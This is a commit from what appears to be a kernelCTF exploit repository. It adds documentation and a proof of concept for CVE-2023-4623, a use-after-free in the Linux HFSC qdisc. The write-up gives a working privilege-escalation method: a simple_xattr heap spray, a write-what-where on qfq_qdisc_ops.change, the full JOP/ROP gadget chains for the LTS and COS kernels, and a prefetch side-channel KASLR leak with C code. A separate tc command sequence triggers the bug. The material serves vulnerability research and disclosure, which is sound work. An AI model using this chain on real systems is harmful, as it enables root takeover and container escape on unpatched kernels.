Add kernelCTF CVE-2023-4623_lts_cos (#110)
* Add CVE-2023-4623_lts_cos

* Remove unnecessary function

* Add comments

* Fix side-channel reliability

* Add docs

* Update Makefile

* Use separate KASLR leak

* Make requested changes
hexfoureight authored Aug 2, 2024
1 parent 0226d51 commit 361a3fb
Showing 11 changed files with 1,232 additions and 0 deletions.
184 changes: 184 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md
@@ -0,0 +1,184 @@
## Overview

The vulnerability leads to a use-after-free on an `hfsc_class` object in `hfsc_dequeue()`. By replacing the vulnerable `hfsc_class` with a crafted `simple_xattr`, we can make `hfsc_dequeue()` perform a write-what-where. This is used to overwrite a function pointer in the kernel's `.data` section that is then called to execute a ROP chain and escape the namespace. The kernel base slide, which is needed to determine the write primitive's target address and ROP gadget addresses, is leaked using a prefetch timing side-channel.

## Setup

The exploit enters a network namespace as root in order to get `CAP_NET_ADMIN`:

```
unshare(CLONE_NEWUSER);
unshare(CLONE_NEWNET);
```
A temporary file is opened to attach attributes to for the `simple_xattr` spray:
```
xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664);
```
If the kernel base is not provided, `kaslr_leak()` leaks it using a prefetch side-channel (see the final section for details).

## Triggering the Vulnerability

To trigger the vulnerability, we need to set up an HFSC qdisc and send packets to it. We will need to open two types of sockets: an `AF_NETLINK` socket for configuring the qdisc and an `AF_INET` socket for enqueueing packets at the qdisc. The qdisc is set up on `lo` by sending preconstructed messages to the Netlink socket. The `tf_msg` struct is used to represent the Netlink route messages, which are constructed in `init_nl_msgs()`. The following sequence of messages is sent:

- `if_up_msg` sets `lo` up so that packets can be sent to the qdisc.
- `newqd_msg` attaches an HFSC qdisc to `lo`.
- `new_rsc_msg` adds a class with an RSC (real-time service curve) to the qdisc as a child of the root class.
- `new_fsc_msg` adds a class with an FSC (link-sharing service curve) to the qdisc as a child of the RSC class.
- At this point an `AF_INET` socket is opened and written to with `loopback_send()`. The message will be enqueued in the FSC class, causing the RSC class to be mistakenly added to the root class's `vt_tree`.
- `delc_msg` deletes the FSC class, then another `delc_msg` deletes the RSC class, leaving a dangling pointer to the underlying `hfsc_class` object in the root class's `vt_tree`.

## Write-What-Where

The use-after-free is reached via [`hfsc_dequeue()`](https://elixir.bootlin.com/linux/v6.1.36/source/net/sched/sch_hfsc.c#L1570), which calls `vttree_get_minvt()`:

```
static struct hfsc_class *
vttree_get_minvt(struct hfsc_class *cl, u64 cur_time)
{
	/* if root-class's cfmin is bigger than cur_time nothing to do */
	if (cl->cl_cfmin > cur_time)
		return NULL;
	while (cl->level > 0) {
		cl = vttree_firstfit(cl, cur_time);
		if (cl == NULL)
			return NULL;
		/*
		 * update parent's cl_cvtmin.
		 */
		if (cl->cl_parent->cl_cvtmin < cl->cl_vt)
			cl->cl_parent->cl_cvtmin = cl->cl_vt;
	}
	return cl;
}
```

The loop will eventually assign our dangling pointer to `cl`. Then the line
```
cl->cl_parent->cl_cvtmin = cl->cl_vt;
```
gives us an 8-byte write-what-where primitive with the restriction that the value written is greater than what it is replacing. This primitive will be used to overwrite the `qfq_qdisc_ops.change()` function pointer in the kernel's `.data` section with a JOP gadget. Since the QFQ qdisc does not define a change function, `qfq_qdisc_ops.change()` is initially `NULL` and can be overwritten with any value.
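The "greater than" restriction can be modeled in isolation. The following is a minimal user-space sketch, not kernel code: `max_update()` and `max_update_demo()` are hypothetical helpers that mirror only the comparison and assignment from the loop above, and the values are made-up placeholders. It illustrates why a slot that starts at zero (such as a `NULL` function pointer) accepts any non-zero value, while a slot that already holds a larger value is left untouched.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Hypothetical helper: mirrors the "update parent's cl_cvtmin" step.
 * The slot only ever moves upwards. Returns 1 if the slot changed.
 */
static int max_update(uint64_t *slot, uint64_t vt)
{
    if (*slot < vt) {
        *slot = vt;
        return 1;
    }
    return 0;
}

/* Placeholder values only; they are not real kernel addresses. */
static void max_update_demo(void)
{
    uint64_t slot = 0;                        /* models a NULL pointer  */

    assert(max_update(&slot, 0x1234) == 1);   /* 0 < 0x1234: written    */
    assert(max_update(&slot, 0x1000) == 0);   /* smaller value: ignored */
    assert(slot == 0x1234);
}
```

Both fields are unsigned 64-bit values in the kernel, so the comparison in this model is unsigned as well.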

A `simple_xattr` is used to store the target address and value. The exploit uses `spray_simple_xattrs()` to add attributes to a temporary file, which sprays the `kmalloc-1024` cache where the vulnerable `hfsc_class` is located with `simple_xattr` objects.

The `value` field of `simple_xattr` is filled with a fake `hfsc_class`. The following fields have to be faked:

- `cl_parent`: The target address minus `offsetof(struct hfsc_class, cl_cvtmin)`, so that `cl_parent->cl_cvtmin` aliases the target. Here the target is `qfq_qdisc_ops.change`.
- `cl_vt`: The 8-byte value to write. Set to the address of a JOP gadget.
- `cl_f`: Set to zero to satisfy the `p->cl_f <= cur_time` condition in `vttree_firstfit()`.
- `level`: Set to a non-zero value to prevent `vttree_get_minvt()` from returning the dangling pointer and causing further use-after-frees.
- `vt_node`: This is the red-black tree node that the vulnerable class is accessed through. We make this a black node with `NULL` children to prevent crashes in `init_vf()` and `vttree_get_minvt()`.
  - `vt_node.__rb_parent_color`: Set to 1, coloring the node black.
  - `vt_node.rb_right`: Set to `NULL` so that it is not dereferenced.
  - `vt_node.rb_left`: Set to `NULL` so that it is not dereferenced.
- `cf_node`: There is another dangling pointer to the vulnerable class from the root class's `cf_tree`. This is filled in the same way as `vt_node` to prevent a crash in `init_vf()` but is not otherwise relevant.

Once a `simple_xattr` has been allocated over the vulnerable `hfsc_class`, another FSC class is created with `new_fsc_msg` so that the qdisc has somewhere to enqueue packets (`hfsc_dequeue()` will return early if the qdisc is empty). The write-what-where in `hfsc_dequeue()` is then triggered by sending an `AF_INET` packet with the `loopback_send()` helper function.

## ROP Chain

Now that `qfq_qdisc_ops.change()` has been overwritten, it can be called by sending the `new_qfq_qdisc` message to a Netlink socket. The kernel will then call the overwritten pointer from `qdisc_change()` with `rsi` pointing to the middle of the sent message. The data around `rsi` is attacker-controlled and contains the ROP chain.

The `new_qfq_qdisc` message is constructed with two consecutive `TCA_OPTIONS` attributes, each of which consists of a 4-byte `rtattr` header followed by a data buffer. When the overwritten function is called, `rsi` will point to the second attribute, whose data buffer stores a ROP chain copied from `rop_buf`. The preceding attribute's buffer contains a single gadget, copied from `jop_buf` and found at `rsi - 0x70` when the chain is executed.

The chain starts by calling the JOP gadget stored at `qfq_qdisc_ops.change()`:
```
push rsi ; jmp qword ptr [rsi - 0x70]
```
The gadget at `rsi - 0x70` then completes the stack pivot to the ROP chain at `rsi + 8` (the offset of `8` is needed to skip the `rtattr` header):
```
pop rsp ; pop rbx ; jmp __x86_return_thunk // rsi - 0x70
```
The ROP chain starts by copying `rdi` into `rbx`, which restores `rbx`'s previous value:
```
push rdi ; pop rbx ; pop rbp ; jmp __x86_return_thunk // rsi + 0x8
0
```
This is necessary because the chain will eventually return to the kernel stack and `rbx` is callee-saved. After this, the usual privilege escalation and namespace escape are performed using `commit_creds()` and `switch_task_namespaces()`:
```
pop rdi ; jmp __x86_return_thunk
0
prepare_kernel_cred()
pop rcx ; jmp __x86_return_thunk
commit_creds()
mov rdi, rax ; jmp __x86_indirect_thunk_rcx
pop rdi ; jmp __x86_return_thunk
1
find_task_by_vpid()
pop rsi ; jmp __x86_return_thunk
init_nsproxy
pop rcx ; jmp __x86_return_thunk
switch_task_namespaces()
mov rdi, rax ; jmp __x86_indirect_thunk_rcx
```

The ROP chain ends by pivoting back to the previous frame on the kernel stack. A kernel stack pointer can be read from `r14` on the LTS instance and `r13` on the COS instance. An offset of `-384` or `-368` is added to this pointer to get the location of the target frame on LTS and COS, respectively. Here are the gadgets for LTS:

```
mov rax, r14 ; pop r14 ; jmp __x86_return_thunk
0
pop rdx ; jmp __x86_return_thunk
pop r14 ; jmp __x86_return_thunk
push rax ; jmp __x86_indirect_thunk_rdx
pop rcx ; jmp __x86_return_thunk
-384
add rax, rcx ; jmp __x86_return_thunk
pop rdx ; jmp __x86_return_thunk
pop rsp ; jmp __x86_return_thunk
push rax ; jmp __x86_indirect_thunk_rdx
```
and COS:
```
mov rax, r13 ; pop r13 ; pop rbp ; jmp __x86_return_thunk
0
0
pop rsi ; jmp __x86_return_thunk
-368
add rax, rsi ; jmp __x86_return_thunk
pop rdx ; jmp __x86_return_thunk
pop rsp ; jmp __x86_return_thunk
push rax ; jmp __x86_indirect_thunk_rdx
```
## Infoleak with Prefetch Timing Side-channel

A simple implementation of the prefetch timing side-channel (described in this [P0 blog post](https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html) and originally from this [paper](https://gruss.cc/files/prefetch.pdf) by Daniel Gruss et al.) is used to bypass KASLR. This side-channel exploits timing differences in `prefetch` instructions that depend on whether the target address is mapped and on the cache state.

Addresses which are mapped and have been recently accessed have a faster prefetch time than unmapped addresses (`prefetch` itself does not count as an access here). We access `sys_getuid()` by calling `getuid()` and then measure prefetch times for all possible locations of `sys_getuid()`. The target instance's kernel base is always located at a `0x1000000` aligned address between `0xffffffff81000000` and `0xffffffffbb000000`, so there are 59 candidate addresses to test.
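The candidate count follows directly from the range and alignment. As a small sanity check, the sketch below recomputes it; `candidate_count()` is a hypothetical helper introduced only for this illustration, and the constants repeat the bounds and alignment stated in the paragraph above.

```c
#include <stdint.h>

#define MIN_STEXT 0xffffffff81000000ULL
#define MAX_STEXT 0xffffffffbb000000ULL
#define BASE_INC  0x1000000ULL

/* Number of step-aligned candidates in the inclusive range [min, max]. */
static uint64_t candidate_count(uint64_t min, uint64_t max, uint64_t step)
{
    return (max - min) / step + 1;
}
```

With these constants, `(0xbb - 0x81) + 1 = 0x3a + 1 = 59`, matching the figure above.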

The attack first finds the minimum prefetch time `min` for the unmapped address `0xffffffff80000000`. Prefetch times for other unmapped addresses will likely be greater than or equal to `min`, so any address with a faster prefetch time is assumed to be mapped. The lowest mapped address found this way is taken to be the kernel base.



```
#define MIN_STEXT 0xffffffff81000000
#define MAX_STEXT 0xffffffffbb000000
#define BASE_INC 0x1000000

/* Returns the leaked kernel base, or -1 if no candidate qualified. */
long kaslr_leak(int tries1, int tries2) {
    long base = -1, addr;
    size_t time;
    size_t min = -1;

    /* Baseline: minimum prefetch time for the unmapped address. */
    addr = 0xffffffff80000000;
    for (int i = 0; i < tries1; i++) {
        time = onlyreload(addr);
        min = min < time ? min : time;
    }

    /* Keep the lowest candidate whose prefetch time beats the baseline. */
    for (int i = 0; i < tries2; i++) {
        for (addr = MIN_STEXT; addr <= MAX_STEXT; addr += BASE_INC) {
            time = onlyreload(addr + SYS_GETUID);
            if (time < min && addr < base) {
                base = addr;
            }
        }
    }
    return base;
}
```

The prefetch timing assembly code in `onlyreload()` is taken from Daniel Gruss's [repository](https://github.com/IAIK/prefetch) with `cpuid` replaced by `mfence` as suggested in the P0 blog post.

The original exploit did not preload the target address, but the leak will not work reliably without this on the current server (likely due to increased cache activity).

This implementation of the side-channel works on the Intel Xeon CPU used by the live instance but not the AMD CPU used by the exploit_repro instance, since there is no timing difference between the two cases it tests for on AMD.
35 changes: 35 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md
@@ -0,0 +1,35 @@
## Vulnerability Details

There is a use-after-free in the traffic control system's HFSC qdisc when an HFSC class with link-sharing has a parent without link-sharing. When a packet is enqueued at the child class, `init_vf()` will call `vttree_insert()` on the parent. However, when the packet is dequeued, `vttree_remove()` will be skipped in `update_vf()` since the parent does not have the `HFSC_FSC` flag set. This leaves a dangling pointer which can be exploited to cause a use-after-free and achieve privilege escalation.

The vulnerability has been present since the HFSC qdisc was introduced in kernel version 2.6.3. It was fixed in version 6.5 with commit `b3d26c5702c7 ("net/sched: sch_hfsc: Ensure inner classes have fsc curve")`. This commit made it impossible for classes without link-sharing curves to become parents, since only inner classes with link-sharing curves are meaningful in the HFSC protocol.

Triggering the vulnerability requires `CONFIG_NET_SCH_HFSC` to be enabled in the kernel configuration. The user must have the `CAP_NET_ADMIN` capability to trigger the vulnerability, which can be gained with access to unprivileged user namespaces. Disabling unprivileged user namespaces prevents the vulnerability from being exploited for privilege escalation.
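To check the mitigation mentioned above, one option is to read the upstream `user.max_user_namespaces` sysctl, where a value of `0` prevents new user namespaces from being created. The sketch below is an illustration under that assumption only: `userns_limit_is_zero()` is a hypothetical helper, and distribution-specific switches for unprivileged user namespaces are not covered.

```c
#include <stdio.h>

/*
 * Hypothetical helper: reads an integer limit from `path`
 * (for example /proc/sys/user/max_user_namespaces).
 * Returns 1 if the limit is 0, 0 if it is non-zero,
 * and -1 if the file cannot be read or parsed.
 */
static int userns_limit_is_zero(const char *path)
{
    FILE *f = fopen(path, "r");
    long limit;

    if (f == NULL)
        return -1;
    if (fscanf(f, "%ld", &limit) != 1) {
        fclose(f);
        return -1;
    }
    fclose(f);
    return limit == 0;
}
```

A caller would pass `"/proc/sys/user/max_user_namespaces"` and treat a return value of `-1` as "unknown" rather than as evidence either way.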

## POC
```
# Set lo up
ip link set lo up
# Create the HFSC qdisc and root class.
tc qdisc add dev lo parent root handle 1: hfsc def 2
# Add a real-time class as a child of root class.
tc class add dev lo parent 1: classid 1:1 hfsc rt umax 1 dmax 1 rate 1
# Add a link-sharing class as a child of the real-time class.
tc class add dev lo parent 1:1 classid 1:2 hfsc ls umax 1 dmax 1 rate 1
# Enqueue packet at link-sharing class, which calls init_vf() on it.
ping -c1 localhost
# Delete the parent and child classes, leaving a dangling pointer.
tc class del dev lo classid 1:2
tc class del dev lo classid 1:1
# Add a link-sharing class to enqueue packets to (if the queue is empty, hfsc_dequeue() will return before reaching the UaF)
tc class add dev lo parent 1: classid 1:2 hfsc ls umax 1 dmax 1 rate 1
# Trigger use after free in hfsc_dequeue()
ping -c1 localhost
```
@@ -0,0 +1,6 @@
CFLAGS = -Wno-incompatible-pointer-types -Wno-format -static

exploit: exploit.c

run:
	./exploit
Binary file not shown.